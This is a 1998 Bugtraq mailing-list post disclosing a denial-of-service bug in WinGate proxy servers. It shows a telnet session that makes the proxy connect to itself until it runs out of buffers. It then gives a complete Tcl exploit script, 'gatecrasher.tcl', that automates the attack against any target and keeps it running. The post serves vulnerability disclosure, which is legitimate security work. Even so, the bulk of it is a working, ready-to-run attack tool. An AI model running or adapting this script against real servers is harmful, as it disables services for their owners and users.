Bugtraq mailing list archives

WinGate DoS

From: carother () OU EDU (Matt Carothers)
Date: Sat, 21 Feb 1998 04:38:56 -0600


After a WinGate attack on our IRC channel, a friend of mine was toying
around and discovered a fun bug:

$ telnet unsecured.wingate.com
Trying XXX.XX.XX.XXX...
Connected to XXX.XX.XX.XXX.
Escape character is '^]'.
WinGate>localhost
Connecting to host localhost...Connected

As you can see, the WinGate happily connects to itself.  Do this enough
times, and ...

WinGate>localhost
Connecting to host localhost...Out of buffers

At this point, the WinGate stops forwarding connections.  Clients can
still connect but cannot make use of it.

Below is a simple TCL exploit to demonstrate the idea.

- Matt

#!/usr/local/bin/tclsh

# gatecrasher.tcl
#
# This opens a WinGate and connects it to itself repeatedly until the
# target machine runs out of buffers and stops forwarding connections.
# The WinGate will not function as long as the script is running.
#
# Credit goes to Chris Snell <texan () hooked net> for finding the bug.
#
# I apologize in advance for not being cool enough to script this is perl.
#
# - Matt Carothers <carother () ou edu>

set host [lindex $argv 0];
set port [lindex $argv 1];

if {![string compare $host ""]} {
  set command [string range $argv0 [expr [string last / $argv0] + 1] end];
  puts stdout "Usage: $command <host> \[port\]";
  exit 1;
}

if {![string compare $port ""]} {
  set port 23;
}

if {[catch {set sock [socket $host $port]} stuff]} {
  # Could not connect for some reason.  Output an error message and exit.
  puts stdout "$host:$port : $stuff";
  exit 1;
}

puts stdout "Connected to $host:$port.  Launching WinGate kill ...";

set flag 0;

puts $sock "localhost";
flush $sock;

while {[gets $sock line] >= 0} {
  if {[string match "*Connected*" $line]} {
    # We've successfully connected the WinGate to itself.
    # Whee, let's do it again.

    puts $sock "localhost";
    flush $sock;

    puts -nonewline stdout ".";
    flush stdout;

    set flag 0;
  } elseif {[string match "*Out of buffers*" $line]} {
    # The WinGate is now out of buffers.
    # We'll output a message to that effect and keep trying.  This
    # serves as a keep-alive and lets us jump in and fill any buffers
    # freed by clients which disconnect after the attack succeeds.

    if {!$flag} {
      puts stdout "\n*plink*";
      set flag 1;
    }

    puts $sock "localhost";
    flush $sock;
  }
}

puts stdout "\nConnection lost.";

Current thread:

Fw: tetex-0.4pl8 world-writable database Micha? Zalewski (Feb 20)
- Re: Fw: tetex-0.4pl8 world-writable database Marcin Cieslak (Feb 20)
- Pipe attack - an example Micha? Zalewski (Feb 20)
- cfs-1.4.0beta2 root exploitable bug ther (Feb 20)
  - WinGate DoS Matt Carothers (Feb 21)
  - Quick update on Radius bug Phillip R. Jaenke (Feb 21)
  - Workaround for radius bug Phillip R. Jaenke (Feb 21)
  - Re: cfs-1.4.0beta2 root exploitable bug ther (Feb 21)
  - resource starvation against passwd(1) Antonomasia (Feb 22)
  - RADIUS (Summary) Aleph One (Feb 22)
    - Re: RADIUS (Summary) Dave Stewart (Feb 22)
    - Re: RADIUS (Summary) Phillip R. Jaenke (Feb 22)
    - Re: RADIUS (Summary) Josh Richards (Feb 22)